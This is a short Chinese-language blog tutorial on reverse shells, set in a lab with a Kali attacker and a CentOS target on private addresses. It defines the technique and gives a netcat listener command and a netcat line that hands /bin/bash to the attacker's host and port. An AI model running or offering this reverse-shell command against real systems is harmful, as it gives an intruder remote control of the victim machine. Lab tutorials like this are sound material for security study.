当前位置: 首页 > article >正文

反弹shell

目录

前言

反弹shell

攻击机监听本机端口

被攻击机发起连接

攻击机操作


前言

反弹shell是一种网络技术,主要用于在攻击者和被攻击者之间建立命令行的输入输出控制通道。与常规的远程连接方式不同,反弹shell是由被攻击者主动向外连接攻击者,而不是由攻击者连接到被攻击者。

反弹shell通常用于被控端受到防火墙限制、无法接受外部连接、或者IP地址动态变化等情况。这种技术确保即使被控设备位于内部网络中,或者由于某些安全限制无法被直接访问时,攻击者依然能够实现远程控制。


反弹shell

攻击机kali ip 192.168.100.222

被攻击机centos ip 192.168.100.130

攻击机监听本机端口

nc -lvp 空闲端口

 nc -lvp 4444


被攻击机发起连接

nc -e /bin/bash 攻击机ip 攻击机监听端口

nc -e /bin/bash 192.168.100.222 4444

如果没有报错或者退出当前命令行,说明连接建立成功


攻击机操作

回到攻击机:

结果显示连接成功

这是就可以进行进一步命令操作了:




http://www.kler.cn/a/295065.html

相关文章:

  • WordPress 6.7 “Rollins”发布
  • flutter 发版的时候设置版本号
  • vue2.7.14 + vant + vue cli脚手架转vite启动运行问题记录
  • Bugku CTF_Web——文件上传
  • 继承和多态(上)
  • Vue 3 介绍及应用
  • 【Python报错已解决】 AttributeError: ‘move_to‘ requires a WebElement
  • Redis单机安装
  • 国开(电大)2024秋《文献检索与论文写作》综合练习2
  • 云服务器部署DB-GPT项目
  • 自动驾驶---Motion Planning之轨迹拼接
  • WIN11 ESP32 IDF + VSCODE 环境搭建[教程向]
  • 不会Excel怎么制作桑基图?用什么软件绘制比较好呢?推荐2款简单好用的图表制作工具
  • c++递推
  • 拉取ros2_control_demos存储库
  • List中常见的方法和五种遍历方式
  • windows下使用vscode编写运行以及调试C/C++
  • 基于STM32设计的ECG+PPG人体参数测量系统(华为云IOT)(217)
  • ROS1 + Realsense d455 固件安装+读取rostopic数据
  • nmon服务器监控工具使用
  • 请解释Java Web应用中的前后端分离是什么?它有哪些好处?什么是Java Web中的Servlet过滤器?它有什么作用?
  • ffmpeg的安装和使用教程
  • python--基础语法(1)
  • 《Ajax 是什么?如何在 HTML5 中使用》
  • 数据结构--二叉树(C语言实现,超详细!!!)
  • 彩色成像的基础和应用 原理 Principles (论文引用目录)